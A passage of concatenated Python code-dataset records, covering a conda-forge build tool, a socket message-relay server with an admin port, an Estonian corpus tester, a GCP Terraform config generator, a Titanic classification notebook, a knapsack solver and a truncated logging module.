graph[package])\n for meta, (package, version) in zip(\n package_metadata.values(), package_specifications.items()\n )\n }\n\n with open('.artifactdir', mode='wt') as f:\n f.write(os.path.abspath(artifact_directory))\n\n with open('.recipedir', mode='wt') as f:\n f.write(os.path.abspath(recipes_directory))\n\n with open('.metadata', mode='wb') as f:\n pickle.dump(metadata, f)\n\n nx_graph = nx.DiGraph()\n for node, edges in graph.items():\n nx_graph.add_node(node)\n for edge in edges:\n nx_graph.add_edge(edge, node)\n ordering = list(nx.topological_sort(nx_graph))\n\n with open('.ordering', mode='wb') as f:\n pickle.dump(ordering, f)\n\n\ndef get_tarballs(artifacts):\n pattern = os.path.join(artifacts, 'linux-64', '*.tar.bz2')\n return [\n tarball for tarball in glob.glob(pattern)\n if not os.path.basename(tarball).startswith('repodata')\n ]\n\n\n@cli.command(help='List tarballs')\n@click.argument(\n 'artifact_directory',\n required=False,\n default=os.path.join('.', 'artifacts')\n)\ndef tarballs(artifact_directory):\n result = get_tarballs(artifact_directory)\n if result:\n click.echo('\\n'.join(result))\n\n\n@cli.command(help='Remove feedstocks and generated files')\ndef clean():\n if os.path.exists('.artifactdir'):\n with open('.artifactdir', mode='rt') as f:\n artifact_directory = f.read().strip()\n\n if glob.glob(os.path.join(artifact_directory, '*')):\n try:\n sh.docker.run(\n '-a', 'stdin',\n '-a', 'stdout',\n '-a', 'stderr',\n '-v', '{}:/artifacts'.format(artifact_directory),\n '-i',\n '--rm',\n '-e', 'HOST_USER_ID={:d}'.format(os.getuid()),\n 'condaforge/linux-anvil',\n 'bash',\n _in='rm -rf /artifacts/*; rm -rf /package_cache/*',\n )\n except sh.ErrorReturnCode as e:\n click.get_binary_stream('stderr').write(e.stderr)\n\n files = [path for path in os.listdir(path='.')]\n\n if files:\n with thread_pool(files) as executor:\n futures = [\n executor.submit(\n functools.partial(shutil.rmtree, ignore_errors=True)\n if os.path.isdir(path) else os.remove,\n path\n ) for path in files\n ]\n\n for future in concurrent.futures.as_completed(futures):\n try:\n future.result()\n except Exception as e:\n click.ClickException(str(e))\n\n\nSCRIPT = '\\n'.join([\n 'conda config --add pkgs_dirs /package_cache',\n 'conda clean --lock',\n 'conda install --yes --quiet conda-forge-build-setup',\n 'source run_conda_forge_build_setup',\n (\n 'CONDA_PY={python} CONDA_NPY={numpy} '\n 'conda build /recipes/{package} --channel file:///artifacts '\n '--output-folder /artifacts --quiet || exit 1'\n ),\n])\n\n\ndef update_animation(\n animation,\n formatter,\n built,\n future,\n lock=threading.Lock(),\n):\n with lock:\n animation.spinner.message = formatter(next(built))\n\n\ndef empty_padding(*args, **kwargs):\n \"\"\"Don't show the default sine wave when animating.\"\"\"\n return ''\n\n\nanimated = functools.partial(decorating.animated, fpadding=empty_padding)\n\n\ndef construct_environment_variables(ctx, param, environment):\n result = {}\n for package, var in (x.split(':', 1) for x in environment):\n result.setdefault(package, set()).add(var)\n return result\n\n\n@cli.command(help='Build conda forge packages in parallel')\n@click.option(\n '-c', '--constraints',\n multiple=True,\n help='Additional special software constraints - e.g., numpy/python.'\n)\n@click.option(\n '-e', '--environment',\n multiple=True,\n callback=construct_environment_variables,\n help='Additional environment variables to pass to builds',\n)\n@click.option(\n '-j', '--jobs',\n type=int,\n default=max(1, cpu_count() // 2),\n help='Number of workers to use for building',\n)\ndef build(constraints, jobs, environment):\n with open('.metadata', mode='rb') as f:\n metadata = pickle.load(f)\n\n if not environment.keys() <= metadata.keys():\n missing_packages = environment.keys() - metadata.keys()\n raise click.ClickException(\n 'Environment variables defined for missing packages {}'.format(\n set(missing_packages)\n )\n )\n\n # modify metadata to propagate envars\n for key, values in environment.items():\n for var in values:\n name, _ = var.split('=', 1)\n metadata[key].meta['build'].setdefault('script_env', []).append(\n name\n )\n\n with open('.recipedir', mode='rt') as f:\n recipes_directory = f.read().strip()\n\n for package, meta in metadata.items():\n path = os.path.join(recipes_directory, package, 'meta.yaml')\n with open(path, mode='wt') as f:\n yaml.dump(meta.meta, f, default_flow_style=False)\n\n if not constraints:\n constraints = 'python >=2.7,<3|>=3.4', 'numpy >=1.10', 'r-base >=3.3.2'\n\n constraint_specifications = {\n key.name: value for key, value in zip(\n *itertools.tee(map(MatchSpec, constraints))\n )\n }\n\n raw_index = conda.api.get_index(\n ('defaults', 'conda-forge'),\n platform='linux-64',\n )\n\n index = {\n dist: record for dist, record in raw_index.items()\n if dist.name not in constraint_specifications or (\n dist.name in constraint_specifications and\n constraint_specifications[dist.name].match(dist)\n )\n }\n\n get_version_matrix = toolz.flip(special_case_version_matrix)(index)\n\n with open('.artifactdir', mode='rt') as f:\n artifact_directory = f.read().strip()\n\n with animated('Constraining special versions (e.g., numpy and python)'):\n with process_pool(metadata) as executor:\n results = executor.map(get_version_matrix, metadata.values())\n\n matrices = dict(zip(metadata.keys(), results))\n\n package_cache_dir = tempfile.TemporaryDirectory(prefix='scourge.build.')\n package_cache = package_cache_dir.name\n\n scripts = {\n (\n package,\n constraints.get('python', '').replace('.', ''),\n constraints.get('numpy', '').replace('.', ''),\n ): SCRIPT.format(\n package=package,\n python=constraints.get('python', '').replace('.', ''),\n numpy=constraints.get('numpy', '').replace('.', ''),\n package_cache=package_cache,\n )\n for package, matrix in matrices.items()\n for constraints in map(dict, matrix)\n }\n\n os.makedirs('logs', exist_ok=True)\n for text_file in glob.glob(os.path.join('logs', '*.txt')):\n os.remove(text_file)\n\n args = (\n '-a', 'stdin',\n '-a', 'stdout',\n '-a', 'stderr',\n '-v', '{}:/artifacts'.format(os.path.abspath(artifact_directory)),\n '-v', '{}:/recipes'.format(os.path.abspath(recipes_directory)),\n '-v', '{}:/package_cache'.format(package_cache),\n '--dns', '8.8.8.8',\n '--dns', '8.8.4.4',\n '-e', 'HOST_USER_ID={:d}'.format(os.getuid()),\n )\n\n tasks = {package: [] for package in matrices.keys()}\n\n for (package, python, numpy), script in scripts.items():\n task_args = functools.reduce(\n lambda args, var: args + ('-e', var),\n environment.get(package, ()),\n args,\n )\n log_path = os.path.join(\n 'logs', '{package}-py{python}-np{numpy}.txt'.format(\n package=package,\n python=python or '_none',\n numpy=numpy or '_none',\n )\n )\n task = sh.docker.run.bake(\n *task_args,\n interactive=True,\n rm=True,\n _in=script,\n _out=log_path,\n _err_to_out=True,\n )\n tasks[package].append((task, python, numpy))\n\n all_tasks = list(itertools.chain.from_iterable(tasks.values()))\n ntasks = len(all_tasks)\n built = itertools.count()\n first = next(built)\n format_string = 'Built {{:{padding}d}}/{:{padding}d} packages'\n formatter = format_string.format(ntasks, padding=len(str(ntasks))).format\n animation = animated(formatter(first))\n\n with open('.ordering', mode='rb') as f:\n ordering = pickle.load(f)\n\n errors = {}\n with animation:\n update_when_done = functools.partial(\n update_animation,\n animation,\n formatter,\n built,\n )\n\n with thread_pool(all_tasks, max_workers=jobs) as executor:\n for package in ordering: # TODO: parallelize on special versions\n futures = {}\n\n for task, python, numpy in tasks[package]:\n future = executor.submit(\n task, 'condaforge/linux-anvil', 'bash'\n )\n future.add_done_callback(update_when_done)\n futures[future] = (package, python, numpy)\n\n for future in concurrent.futures.as_completed(futures.keys()):\n try:\n future.result()\n except Exception as e:\n failed_package = futures[future]\n errors[failed_package] = '{}: {}'.format(\n '-'.join(filter(None, failed_package)),\n str(e)\n )\n if errors:\n path = os.path.join('logs', 'errors.txt')\n formatted_error_message = format_errors(errors)\n with open(path, mode='w') as f:\n f.write(formatted_error_message)\n raise click.ClickException(\n 'Errors during build. See logs dir for details:\\n{}'.format(\n formatted_error_message\n )\n )\n\n\ndef format_errors(errors):\n key_names = '', 'python', 'numpy'\n messages = [\n '- {}'.format(\n '/'.join(map(operator.add, key_names, filter(None, key)))\n ) for key in errors.keys()\n ]\n return '\\n'.join(messages)\n","sub_path":"scourge/scourge.py","file_name":"scourge.py","file_ext":"py","file_size_in_byte":19413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"325662481","text":"#!/usr/bin/python3.5\n# coding: utf-8\n\nimport sys\nimport os\nimport socket\nimport select\nimport time\nimport json\nfrom collections import deque\nfrom daemon.apps.console.process import Cli\n\n\ndef stdout(msg):\n date = time.strftime(\"%F %T\")\n msg = \"%s %s\" % (date, msg)\n print(msg, end=\"\")\n\n\nclass Server:\n def __init__(self, listen):\n assert isinstance(listen, tuple), \"listen address must be a tuple!\"\n self._listen = listen\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # server端\n self._socket_admin = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 客户端\n self._socket_admin.bind(('127.0.0.1', 4444))\n self._socket_admin.listen(1)\n self._socket.bind(self._listen)\n self._socket.listen(1)\n self._offline = [] # 离线anget\n self._online = [] # 在线agent\n self._clients = [] # 在线agent\n self._inputs = [self._socket, ]\n self._process = [self._socket_admin,]\n self._msgs = deque() # 消息队列\n\n def broadcast(self, msg, exclude=None): # 广播\n \"\"\"broadcast method\n 向所有连接到server的agent发送消息\n :param msg: str\n :param exclude: socket \n :return: None\n \"\"\"\n date = time.strftime(\"%F %T\")\n msg = \"%s %s\" % (date, msg)\n msg = msg.encode(\"utf-8\") # 将agent发送过来的数据解码 utf-8\n for client in self._inputs:\n if self._socket != client:\n if not exclude:\n client.sendall(bytes(msg))\n elif exclude and exclude != client:\n client.sendall(bytes(msg))\n\n def send(self, to, msg): # 向指定agent发送消息\n date = time.strftime(\"%F %T\")\n self._socket.sendto(bytes(date + \" \" + msg.encode(\"utf-8\")), addr=to)\n\n def run(self):\n while True:\n reader_list, write_list, except_list = select.select(self._inputs, [], [])\n for socket_obj in reader_list:\n if socket_obj is self._socket:\n client, address = socket_obj.accept()\n self._inputs.append(client)\n self._clients.append(client)\n broadcast_msg_server = \"client %s connected.\\n\" % (\":\".join(list(str(x) for x in iter(address))))\n broadcast_msg_client = \"welcome %s !!!\\n\" \\\n % (\":\".join(list(str(x) for x in iter(address))))\n print(broadcast_msg_server, end=\"\")\n self.broadcast(broadcast_msg_client)\n else:\n data = socket_obj.recv(1024)\n self._msgs.append(data.decode(\"utf-8\"))\n client_prop = \":\".join(list(str(x) for x in socket_obj.getpeername()))\n recv_msg = \"[ %s ] >>> %s\" % (client_prop, self._msgs.popleft())\n offline_msg = \"client %s disconnected.\\n\" % client_prop\n if data != b'': # agent断开连接\n stdout(recv_msg)\n self.broadcast(str(recv_msg), exclude=socket_obj)\n else:\n self._inputs.remove(socket_obj)\n self._clients.remove(socket_obj)\n stdout(offline_msg)\n self.broadcast(offline_msg, exclude=socket_obj)\n continue\n\n def process(self): # 管理工具,客户端\n while True:\n r, w, e = select.select(self._process, [], [])\n for i in r:\n if i is self._socket_admin:\n conn, address = self._socket_admin.accept()\n self._process.append(conn)\n else:\n data = i.recv(1024) # 接收数据\n if data != b'': # 判断数据是否为空\n data = data.decode(\"utf-8\") # 解码数据\n cli = Cli(self, self._socket_admin, data, self._clients) # 实例化Cli类型\n i.sendall(cli.run()) # 指令匹配\n print(data,cli.run())\n else:\n continue\n\n def stop(self):\n \"\"\"关闭套接子\n :return: \n \"\"\"\n self._socket.close()\n\n def restart(self):\n \"\"\"重新打开套接字\n :return: \n \"\"\"\n self.stop()\n self.run()\n\n @property\n def listen(self):\n \"\"\"监听地址\n :return: \n \"\"\"\n return self._listen\n\n @property\n def clients(self):\n \"\"\"agent\n :return: \n \"\"\"\n return self._clients\n\n @property\n def online(self):\n return self._online\n\n @property\n def offline(self):\n return self._online\n\n def __enter__(self):\n return self.run()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self._socket.close()\n\n def __iter__(self):\n return iter(self._clients)\n\n\n\n","sub_path":"daemon/apps/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"159847148","text":"#!/usr/local/bin/python\n# coding: utf-8\n\"\"\"\nKorpuse automaattestija, mis käib läbi kogu etteantud korpuse ning kogub lihtsustamistulemuste kohta statistikat\nAutor: Stiivo Siider\n\"\"\"\nimport estnltk\nimport re\nimport requests\nfrom estnltk import Text\nfrom estnltk import teicorpus\n\n\ndef testCorp():\n korpus = teicorpus.parse_tei_corpora(\"./tei_test\", suffix=\".tei\", target=[\"artikkel\", \"alaosa\", \"tervikteos\"])\n errorCounter = 0\n errorSents = []\n errors = []\n totalCounter = 0\n simplifiedCounter = 0\n verb1Counter = 0\n main1Counter = 0\n rootCounter = 0\n for artikkel in korpus:\n for sentence in artikkel.sentence_texts:\n try:\n r = requests.get('http://prog.keeleressursid.ee/ss_syntax/?l=' + sentence)\n tulemus = re.sub('.*?(.*?)
.*?', r'\\1', r.text, flags=re.DOTALL)\n info, lause = tulemus.strip().split(\"---- \")\n totalCounter += 1\n if \"__ÜKS TEGUSÕNA__\" in info:\n verb1Counter += 1\n elif \"__MITU JUURSÕNA__\" in info:\n rootCounter += 1\n elif \"__ÜKS PEASÕNA__\" in info:\n main1Counter += 1\n if \"__LIHTSUSTATUD__\" in info:\n simplifiedCounter += 1\n print(sentence)\n print(lause)\n print(\"-----------------------------\")\n\n except Exception as e:\n errorCounter += 1\n errorSents.append(sentence)\n errors.append(str(e))\n\n print(\"Total\", totalCounter)\n print(\"Simplified\", simplifiedCounter)\n print(\"Stopped 1 verb\", verb1Counter)\n print(\"Stopped 1 main\", main1Counter)\n print(\"Stopped 2+ root\", rootCounter)\n\n print(\"Errors\", errorCounter)\n for i, sent in enumerate(errorSents):\n print(\"Error sentence\", sent)\n print(\"Error message\", errors[i])\n print()\n\n\ntestCorp()\n","sub_path":"testija.py","file_name":"testija.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"196700674","text":"from gcpautoutil.executeTerraform import executedeployment\nfrom gcpautoutil.flagconstants import sheetdictmap, boolfields, strfields, deployment_execution_order, listfields\n\n\ndef writetoterraform(fieldvaldict, resource):\n \"\"\"\n Function to generate a .tfvars file for resources\n :param fieldvaldict: dictionary of values\n :param resource: resource getting deployed\n :return:\n \"\"\"\n with open('terraform/' + resource + '/terraform.tfvars', 'w+') as f:\n for i in fieldvaldict:\n if i in boolfields:\n strf = i + ' = ' + str(fieldvaldict[i]) + '\\n'\n elif i in strfields:\n strf = i + ' = ' + '\"' + str(fieldvaldict[i]).lower() + '\"\\n'\n elif i in listfields:\n strf = i + ' = ' + '[' + str(fieldvaldict[i]).lower() + ']\\n'\n else:\n strf = i + ' = ' + '\"' + str(fieldvaldict[i]) + '\"\\n'\n\n f.write(strf)\n f.flush()\n\n\ndef mapwithvalues(sheetname, fielddict):\n \"\"\"\n The function is to map with the values\n :param sheetname: sheetname from excel\n :param fielddict: dictionary of values\n :return: dictionary\n \"\"\"\n fieldvaldict = dict()\n for field in fielddict.keys():\n try:\n fieldvaldict[sheetdictmap[sheetname][str(field).strip()]] = fielddict[field]\n except KeyError as ke:\n continue\n return fieldvaldict\n\n\ndef mapwithterraform(vardict, sheetname):\n \"\"\"\n\n :param vardict:\n :param sheetname:\n :return:\n \"\"\"\n if sheetname == deployment_execution_order[2]:\n subdict = vardict['SUBNET']\n vpcdict = vardict[sheetname]\n\n # mapping for vpc\n fieldvaldict = mapwithvalues(sheetname, vpcdict)\n print('dict : ', fieldvaldict)\n\n writetoterraform(fieldvaldict, 'vpc')\n networkname = fieldvaldict['name']\n project = fieldvaldict['project']\n region = fieldvaldict['region']\n\n executedeployment('vpc')\n # mapping for subnet\n for subnum in subdict:\n fieldvaldict = mapwithvalues(sheetname, subdict[subnum])\n\n if 'network' not in fieldvaldict.keys():\n fieldvaldict['network'] = networkname\n fieldvaldict['project'] = project\n fieldvaldict['region'] = region\n writetoterraform(fieldvaldict, 'subnet')\n executedeployment('subnet')\n\n if sheetname == deployment_execution_order[1]:\n providerdict = vardict[sheetname]\n # mapping for provider\n fieldvaldict = mapwithvalues(sheetname, providerdict)\n print('dict : ', fieldvaldict)\n writetoterraform(fieldvaldict, 'provider')\n executedeployment('provider')\n\n if sheetname == deployment_execution_order[3]:\n instancedict = vardict[sheetname]\n # mapping for instance\n fieldvaldict = mapwithvalues(sheetname, instancedict)\n writetoterraform(fieldvaldict, 'instance')\n executedeployment('instance')\n\n if sheetname == deployment_execution_order[4]:\n firewalldict = vardict[sheetname]\n # mapping for firewall\n fieldvaldict = mapwithvalues(sheetname, firewalldict)\n writetoterraform(fieldvaldict, 'firewall')\n executedeployment('firewall')\n\n if sheetname == deployment_execution_order[5]:\n peerdict = vardict[sheetname]\n # mapping for peering\n fieldvaldict = mapwithvalues(sheetname, peerdict)\n resourcepath = r'projects/'+fieldvaldict['project']+'/global/networks/'\n network = fieldvaldict['network']\n peernet = fieldvaldict['peernetwork']\n projectid = fieldvaldict['project']\n newnet = resourcepath+network\n newpeernet = resourcepath + peernet\n fieldvaldict['network'] = newnet\n fieldvaldict['peernetwork'] = newpeernet\n writetoterraform(fieldvaldict, 'vpc-peering')\n executedeployment('vpc-peering')\n\n if sheetname == deployment_execution_order[6]:\n nodedict = vardict['NODE']\n clusterdict = vardict[sheetname]\n\n # mapping for vpc\n fieldvaldict = mapwithvalues(sheetname, clusterdict)\n\n writetoterraform(fieldvaldict, 'gke_cluster')\n clustername = fieldvaldict['name']\n\n executedeployment('gke_cluster')\n # mapping for subnet\n for subnum in nodedict:\n fieldvaldict = mapwithvalues(sheetname, nodedict[subnum])\n\n if 'cluster' not in fieldvaldict.keys():\n fieldvaldict['cluster'] = clustername\n writetoterraform(fieldvaldict, 'gke_node')\n executedeployment('gke_node')\n","sub_path":"gcpautoutil/mapwithterraform.py","file_name":"mapwithterraform.py","file_ext":"py","file_size_in_byte":4620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"492941721","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n# Imports\n\n# pandas\nimport pandas as pd\nfrom pandas import Series,DataFrame\n\n# numpy, matplotlib, seaborn\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_style('whitegrid')\nget_ipython().magic(u'matplotlib inline')\n\n# machine learning\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier,GradientBoostingClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\n\n\n# In[ ]:\n\n\n# get titanic & test csv files as a DataFrame\ntitanic_df = pd.read_csv(\"../input/train.csv\")\ntest_df = pd.read_csv(\"../input/test.csv\")\n\n\n# In[ ]:\n\n\n# preview the data\ntitanic_df.head()\n\n\n# In[ ]:\n\n\nprint(titanic_df.info())\nprint(\"----------------------------\")\nprint(test_df.info())\n\n\n# In[ ]:\n\n\n# drop unnecessary columns, these columns won't be useful in analysis and prediction\ntitanic_df = titanic_df.drop(['PassengerId','Name','Ticket'], axis=1)\ntest_df = test_df.drop(['Name','Ticket'], axis=1)\n\n\n# In[ ]:\n\n\n# Embarked\n\n# only in titanic_df, fill the two missing values with the most occurred value, which is \"S\".\ntitanic_df[\"Embarked\"] = titanic_df[\"Embarked\"].fillna(\"S\")\n\n# plot\nsns.factorplot('Embarked','Survived', data=titanic_df,size=4,aspect=3)\n\nfig, (axis1,axis2,axis3) = plt.subplots(1,3,figsize=(15,5))\n\nsns.countplot(x='Embarked', data=titanic_df, ax=axis1)\nsns.countplot(x='Survived', hue=\"Embarked\", data=titanic_df, order=[1,0], ax=axis2)\n\n# group by embarked, and get the mean for survived passengers for each value in Embarked\nembark_perc = titanic_df[[\"Embarked\", \"Survived\"]].groupby(['Embarked'],as_index=False).mean()\nsns.barplot(x='Embarked', y='Survived', data=embark_perc,order=['S','C','Q'],ax=axis3)\n\n# Either to consider Embarked column in predictions,\n# and remove \"S\" dummy variable, \n# and leave \"C\" & \"Q\", since they seem to have a good rate for Survival.\n\n# OR, don't create dummy variables for Embarked column, just drop it, \n# because logically, Embarked doesn't seem to be useful in prediction.\n\nembark_dummies_titanic = pd.get_dummies(titanic_df['Embarked'])\nembark_dummies_titanic.drop(['S'], axis=1, inplace=True)\n\nembark_dummies_test = pd.get_dummies(test_df['Embarked'])\nembark_dummies_test.drop(['S'], axis=1, inplace=True)\n\ntitanic_df = titanic_df.join(embark_dummies_titanic)\ntest_df = test_df.join(embark_dummies_test)\n\ntitanic_df.drop(['Embarked'], axis=1,inplace=True)\ntest_df.drop(['Embarked'], axis=1,inplace=True)\n\n\n# In[ ]:\n\n\n# Fare\n# only for test_df, since there is a missing \"Fare\" values\ntest_df[\"Fare\"].fillna(test_df[\"Fare\"].mean(), inplace=True)\n\n# convert from float to int\ntitanic_df['Fare'] = titanic_df['Fare'].astype(int)\ntest_df['Fare'] = test_df['Fare'].astype(int)\n\n# get fare for survived & didn't survive passengers \nfare_not_survived = titanic_df[\"Fare\"][titanic_df[\"Survived\"] == 0]\nfare_survived = titanic_df[\"Fare\"][titanic_df[\"Survived\"] == 1]\n\n# get average and std for fare of survived/not survived passengers\navgerage_fare = DataFrame([fare_not_survived.mean(), fare_survived.mean()])\nstd_fare = DataFrame([fare_not_survived.std(), fare_survived.std()])\n\n# plot\ntitanic_df['Fare'].plot(kind='hist', figsize=(15,3),bins=100, xlim=(0,50))\n\navgerage_fare.index.names = std_fare.index.names = [\"Survived\"]\navgerage_fare.plot(yerr=std_fare,kind='bar',legend=False)\n\n\n# In[ ]:\n\n\n# Cabin\n# It has a lot of NaN values, so it won't cause a remarkable impact on prediction in this simple model\ntitanic_df.drop(\"Cabin\",axis=1,inplace=True)\ntest_df.drop(\"Cabin\",axis=1,inplace=True)\n\n\n# In[ ]:\n\n\n# Age \n# get average, std, and number of NaN values in titanic_df\naverage_age_titanic = titanic_df[\"Age\"].mean()\nstd_age_titanic = titanic_df[\"Age\"].std()\ncount_nan_age_titanic = titanic_df[\"Age\"].isnull().sum()\n\n# get average, std, and number of NaN values in test_df\naverage_age_test = test_df[\"Age\"].mean()\nstd_age_test = test_df[\"Age\"].std()\ncount_nan_age_test = test_df[\"Age\"].isnull().sum()\n\n# generate random numbers between (mean - std) & (mean + std)\nrand_1 = np.random.randint(average_age_titanic - std_age_titanic, average_age_titanic + std_age_titanic, size = count_nan_age_titanic)\nrand_2 = np.random.randint(average_age_test - std_age_test, average_age_test + std_age_test, size = count_nan_age_test)\n\n# drop all null values, and convert to int\ntitanic_df['Age'].dropna().astype(int)\n# test_df['Age'].dropna().astype(int).hist(bins=70, ax=axis1)\n\n# fill NaN values in Age column with random values generated\ntitanic_df[\"Age\"][np.isnan(titanic_df[\"Age\"])] = rand_1\ntest_df[\"Age\"][np.isnan(test_df[\"Age\"])] = rand_2\n\n# convert from float to int\ntitanic_df['Age'] = titanic_df['Age'].astype(int)\ntest_df['Age'] = test_df['Age'].astype(int)\n\n\n# In[ ]:\n\n\n# Sex\n\n# As we see, children(age < ~16) on aboard seem to have a high chances for Survival.\n# So, we can classify passengers as males, females, and child\ndef get_person(passenger):\n age,sex = passenger\n return 'child' if age < 16 else sex\n \ntitanic_df['Person'] = titanic_df[['Age','Sex']].apply(get_person,axis=1)\ntest_df['Person'] = test_df[['Age','Sex']].apply(get_person,axis=1)\n\n# No need to use Sex column since we created Person column\ntitanic_df.drop(['Sex'],axis=1,inplace=True)\ntest_df.drop(['Sex'],axis=1,inplace=True)\n\n# create dummy variables for Person column, & drop Male as it has the lowest average of survived passengers\nperson_dummies_titanic = pd.get_dummies(titanic_df['Person'])\nperson_dummies_titanic.columns = ['Child','Female','Male']\nperson_dummies_titanic.drop(['Male'], axis=1, inplace=True)\n\nperson_dummies_test = pd.get_dummies(test_df['Person'])\nperson_dummies_test.columns = ['Child','Female','Male']\nperson_dummies_test.drop(['Male'], axis=1, inplace=True)\n\ntitanic_df = titanic_df.join(person_dummies_titanic)\ntest_df = test_df.join(person_dummies_test)\n\nfig, (axis1,axis2) = plt.subplots(1,2,figsize=(10,5))\n\nsns.factorplot('Person',data=titanic_df,kind='count',ax=axis1)\n#sns.countplot(x='Person', data=titanic_df, ax=axis1)\n\n# average of survived for each Person(male, female, or child)\nperson_perc = titanic_df[[\"Person\", \"Survived\"]].groupby(['Person'],as_index=False).mean()\nsns.barplot(x='Person', y='Survived', data=person_perc, ax=axis2, order=['male','female','child'])\n\ntitanic_df.drop(['Person'],axis=1,inplace=True)\ntest_df.drop(['Person'],axis=1,inplace=True)\n\n\n# In[ ]:\n\n\n# define training and testing sets\n\nX_train = titanic_df.drop(\"Survived\",axis=1)\nY_train = titanic_df[\"Survived\"]\nX_test = test_df.drop(\"PassengerId\",axis=1).copy()\n\n\n# In[ ]:\n\n\n# Logistic Regression\n\nlogreg = LogisticRegression()\n\nlogreg.fit(X_train, Y_train)\n\nY_pred = logreg.predict(X_test)\n\nlogreg.score(X_train, Y_train)\n\n\n# In[ ]:\n\n\n#Support Vector Machines\n\nsvc = SVC()\n\nsvc.fit(X_train, Y_train)\n\nY_pred = svc.predict(X_test)\n\nsvc.score(X_train, Y_train)\n\n\n# In[ ]:\n\n\n# Random Forests\n\nrandom_forest = RandomForestClassifier(n_estimators=100,oob_score=True,max_features=5)\n\nrandom_forest.fit(X_train, Y_train)\n\nY_pred = random_forest.predict(X_test)\n\nrandom_forest.score(X_train, Y_train)\n\n\n# In[ ]:\n\n\nrandom_forest.get_params,random_forest.feature_importances_\n\n\n# In[ ]:\n\n\n# Gradient Boosts\ngrad_boost = GradientBoostingClassifier(n_estimators=1000)\ngrad_boost.fit(X_train, Y_train)\nY_pred = grad_boost.predict(X_test)\ngrad_boost.score(X_train, Y_train)\n\n\n# In[ ]:\n\n\n# get Correlation Coefficient for each feature using Logistic Regression\ncoeff_df = DataFrame(titanic_df.columns.delete(0))\ncoeff_df.columns = ['Features']\ncoeff_df[\"Coefficient Estimate\"] = pd.Series(logreg.coef_[0])\n\n# preview\ncoeff_df\n\n\n# In[ ]:\n\n\nsubmission = pd.DataFrame({\n \"PassengerId\": test_df[\"PassengerId\"],\n \"Survived\": Y_pred\n })\nsubmission.to_csv('titanic.csv', index=False)\n\n","sub_path":"Notebooks/py/adityaecdrid/random-forest-classifier-for-a-starter/random-forest-classifier-for-a-starter.py","file_name":"random-forest-classifier-for-a-starter.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"236401630","text":"# In this programming problem and the next you'll code up the knapsack algorithm from lecture.\n#\n# Let's start with a warm-up. Download the text file below.\n#\n# knapsack1.txt\n# This file describes a knapsack instance, and it has the following format:\n#\n# [knapsack_size][number_of_items]\n#\n# [value_1] [weight_1]\n#\n# [value_2] [weight_2]\n#\n# ...\n#\n# For example, the third line of the file is \"50074 659\", indicating that the second item has value 50074 and size 659, respectively.\n#\n# You can assume that all numbers are positive. You should assume that item weights and the knapsack capacity are integers.\n#\n# In the box below, type in the value of the optimal solution.\n\nimport numpy as np\n\nfile = open(\"knapsack1.txt\", \"r\")\ni = 0\nitemDict = {}\nfor line in file:\n split = line.split()\n if i == 0:\n knapsack_size = int(split[0])\n number_of_items = int(split[1])\n\n else:\n itemDict[i] = {}\n itemDict[i][\"value\"] = int(split[0])\n itemDict[i][\"weight\"] = int(split[1])\n i += 1\n\nA = np.zeros(shape=(number_of_items + 1, knapsack_size + 1), dtype=np.int32)\n\nfor i in range(1, number_of_items + 1):\n for x in range(1, knapsack_size + 1):\n if x - itemDict[i][\"weight\"] > 0:\n A[i, x] = max(A[i - 1, x], A[i - 1, x - itemDict[i][\"weight\"]] + itemDict[i][\"value\"])\n else:\n A[i, x] = A[i - 1, x]\n\nprint(A[number_of_items, knapsack_size])\n\n","sub_path":"Stanford/Algorithms/Course 3 - Greedy Algorithms, Minimum Spanning Trees, and Dynamic Programming/assignments/4/knapsack1.py","file_name":"knapsack1.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"73562084","text":"\"\"\"This module implements event logging.\n\nEvent logging is implemented via *@log_event* and *@log_exception* decorators.\n\nLogging level is configured via *loglevel* parameter in configuration file, which may take one of the following values:\n\n* INFO\n* ERROR\n* DEBUG\n\nDefault loglevel is **ERROR**. With this loglevel, exceptions are logged with request URL and response code, no sensitive\ninformation is logged. \n\nA path and file name of the logfile is defined by *logfile* parameter in configuration file which takes full absolute\npath and filename to configuration file. Default logfile location is **pyvdp.log** in the same directory, where \nconfiguration file is located.\n\n**Usage:**\n\n .. code-block:: python\n \n from pyvdp import logger\n \n @logger.log_event\n def foo(bar):\n return baz\n \n @logger.log_exception\n def xyz(abc):\n return True\n\"\"\"\nimport functools\nimport logging\nimport uuid\n\nfrom pyvdp import configuration\n\nconfig = configuration.get_config()\n\n\ndef get_logger():\n \"\"\"Creates an instance of logger.\n \n :return: logger \n \"\"\"\n logger = logging.getLogger('pyvdp')\n loglevel = logging.getLevelName(config['loglevel'])\n logger.setLevel(loglevel)\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n\n if not logger.handlers:\n fh = logging.FileHandler(config['logfile'])\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n return logger\n\n\ndef log_event(func):\n \"\"\"Decorator function to log events.\"\"\"\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n logger = get_logger()\n\n result = func(*args, **kwargs)\n\n _uuid = uuid.uuid4()\n\n logger.info(\"[%s] Request: %s %s\" % (_uuid, result['request']['method'], result['request']['url']))\n logger.debug(\"[%s] Request HTTP headers: %s\" % (_uuid, result['request']['headers']))\n logger.debug(\"[%s] Request payload: %s\" % (_uuid, 